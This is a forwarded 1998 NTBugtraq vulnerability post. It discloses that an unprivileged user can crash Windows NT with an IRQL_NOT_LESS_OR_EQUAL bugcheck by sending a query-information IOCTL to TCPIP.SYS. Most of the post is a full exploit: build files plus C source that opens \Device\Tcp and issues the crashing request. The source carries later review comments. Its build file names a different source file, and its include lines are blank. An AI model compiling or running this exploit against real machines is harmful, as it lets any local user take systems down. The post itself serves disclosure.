---------- Forwarded message ----------
From: Gigi Mori 
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Date: Fri, 25 Sep 1998 18:19:50 +0200
Subject: Crashing NT with Native Calls

Hi,

Playing with TCPIP.SYS I've noticed that any user could crash the local system with an
IRQL_NOT_LESS_OR_EQUAL exception just by calling the undocumented function NtDeviceIoControlFile with a
handle to TCPIP and the "right" parameters.  NtDeviceIoControlFile is the native counterpart of
DeviceIoControl and is called by InetMib1.dll and the WINSOCK Helper DLLs to retrieve TCPIP statistics, thus
no special rights are needed to run the exploit.  The bug resides in the TCPIP.SYS InternalIoControl dispatch
routine, which lacks a check on the current IRQL before processing the query information request.

This is the exploit (you should compile it with the DDK):

--------------- begin SOURCES ---------------------------

TARGETNAME= tcpinfo
TARGETPATH= .
TARGETTYPE= PROGRAM

INCLUDES=       .; ..\; \DDK\inc;\DDK\src\network\inc

SOURCES=        tcpinfo.c

UMTYPE=         console
UMBASE=         0x400000
UMLIBS=         \DDK\lib\i386\checked\ntdll.lib
--------------- end SOURCES -----------------------------
--------------- begin makefile --------------------------
#
# DO NOT EDIT THIS FILE!!!  Edit .\sources. if you want to add a new source
# file to this component.  This file merely indirects to the real make file
# that is shared by all the driver components of the Windows NT DDK
#

!INCLUDE $(NTMAKEENV)\makefile.def
--------------- end makefile ----------------------------
--------------- begin native.h --------------------------
#ifndef gigi_native_h
#define gigi_native_h

/*
 * Stand-in for the status block handed to NtDeviceIoControlFile:
 * tcp_query_information() passes an nt_overlapped as the IoStatusBlock
 * argument.  The first two members presumably overlay the kernel
 * IO_STATUS_BLOCK (Status / Information); hevent is the event created
 * next to it and is not part of the kernel structure.
 * NOTE(review): layout assumption, confirm against the DDK definition.
 */
typedef struct {
        unsigned int    bo;
        unsigned int    result;
        HANDLE                          hevent;
} nt_overlapped;

/* IOCTL code sent to \Device\Tcp by tcp_query_information(). */
#define IOCTL_TCP_QUERY_INFORMATION     0x120003
#endif /* gigi_native_h */
-------------- end native.h ----------------------------
-------------- begin tcpexploit.c ------------------------
#include 
#include 
#include 
#include "native.h"

#define MAX_NAME_LEN    256

/*
 * Process-wide state shared by open_tcp(), close_tcp() and main().
 */
struct {
        HANDLE  h_tcp;          /* \Device\Tcp handle: set by open_tcp(), released by close_tcp() */
        char    buff[0x400];    /* output buffer main() hands to tcp_query_information() */
} g;


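/*
 * Open a handle to \Device\Tcp and store it in g.h_tcp.
 *
 * Returns 1 on success, 0 if ZwCreateFile fails (an error line with the
 * NTSTATUS is printed to stdout).  The handle is owned by the global g
 * and is released by close_tcp().
 */
unsigned int
open_tcp(void)
{
        OBJECT_ATTRIBUTES       object_attrs;
        UNICODE_STRING  device_tcp;
        IO_STATUS_BLOCK io_status_block;
        NTSTATUS        status;

        /* RtlInitUnicodeString points device_tcp at the literal itself; the
         * WCHAR scratch buffer the original assigned first was overwritten
         * immediately (and had the wrong pointer type), so it is gone. */
        RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");

        InitializeObjectAttributes(&object_attrs, &device_tcp,
                                OBJ_CASE_INSENSITIVE, NULL, NULL);

        /* Hard-coded DesiredAccess mask (0x20000000 is the GENERIC_EXECUTE
         * bit in the Win32 access-mask layout); other arguments unchanged. */
        status = ZwCreateFile(&g.h_tcp, 0x20000000, &object_attrs,
                        &io_status_block, 0,
                        FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ|FILE_SHARE_WRITE,
                        FILE_OPEN_IF,
                        0, NULL, 0);
        if(status != STATUS_SUCCESS) {
                /* Only the NTSTATUS is printed.  The original passed the whole
                 * IO_STATUS_BLOCK struct to a %#x conversion, which is undefined
                 * behaviour, and the block may not have been written at all
                 * when the call fails. */
                printf("ZwCreateFile error %#x\n", (unsigned int)status);

                return 0;
        }

        return 1;
}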

/* Release the \Device\Tcp handle held in g.h_tcp (opened by open_tcp()). */
void
close_tcp()
{
        HANDLE h = g.h_tcp;

        /* Return status is not inspected, as in the original. */
        (void)ZwClose(h);
}

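/*
 * Issue IOCTL_TCP_QUERY_INFORMATION on g.h_tcp through the native
 * NtDeviceIoControlFile call.
 *
 * in_buff / in_buff_len    request block handed to the driver as InputBuffer
 * out_buff / out_buff_len  caller-owned buffer handed over as OutputBuffer
 *
 * Returns 0 if the completion event cannot be created (an error line is
 * printed), otherwise 1 once the IOCTL has been issued and the event
 * closed.  The NTSTATUS returned by the IOCTL itself is only printed,
 * not returned to the caller.
 */
unsigned int
tcp_query_information(void *in_buff, unsigned int in_buff_len,
        void *out_buff, unsigned int out_buff_len)
{
        NTSTATUS        status;
        nt_overlapped   prova;

        /* Arguments (hard-coded access mask, no object attributes, event type
         * 1, initial state NULL) are exactly those of the original call. */
        status = NtCreateEvent(&prova.hevent, 0x1F003, 0, 1, NULL);
        if(status != STATUS_SUCCESS) {
                /* The original format string read "0x#x" (no '%'), so the
                 * status value was never actually printed. */
                printf("NtCreateEvent error %#x\n", (unsigned int)status);

                return 0;
        }

        /* &prova doubles as the IoStatusBlock argument.  NOTE(review): if the
         * driver ever returned STATUS_PENDING the caller should wait on
         * prova.hevent before this stack frame (and prova) goes away; the
         * original did not, and that behaviour is kept here. */
        status = NtDeviceIoControlFile(g.h_tcp, prova.hevent, 0, 0,
                        &prova, IOCTL_TCP_QUERY_INFORMATION,
                        in_buff, in_buff_len,
                        out_buff, out_buff_len);

        ZwClose(prova.hevent);

        printf("%#X\n", (unsigned int)status);

        return 1;
}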

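/*
 * Entry point: open \Device\Tcp, send one TCP query-information request
 * and release the handle.  Declared void __cdecl main() to match the DDK
 * console build (UMTYPE=console) described in the accompanying SOURCES.
 */
void    __cdecl
main()
{
        struct tcp_request_query_information_ex in_buff;

        if(!open_tcp()) {
                return;
        }

        /* Only the ID part of the request is filled in; no other member of
         * in_buff is written before the call, exactly as in the original.
         * The 0x24 length below is the author's; NOTE(review): presumably
         * equals sizeof in_buff, confirm against the DDK header. */
        in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;
        in_buff.ID.toi_entity.tei_instance = 0;
        in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;
        in_buff.ID.toi_type = INFO_TYPE_CONNECTION;
        in_buff.ID.toi_id = 0x5;

        /* The return value only reports whether the request could be issued;
         * the handle is released either way.  The original returned early on
         * failure and skipped close_tcp(), leaking g.h_tcp until exit. */
        (void)tcp_query_information(&in_buff, 0x24, g.buff, sizeof(g.buff));

        close_tcp();
}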
----------------- end tcpexploit.c ---------------------------------

Luigi Mori --
Symbolic (http://www.symbolic.it)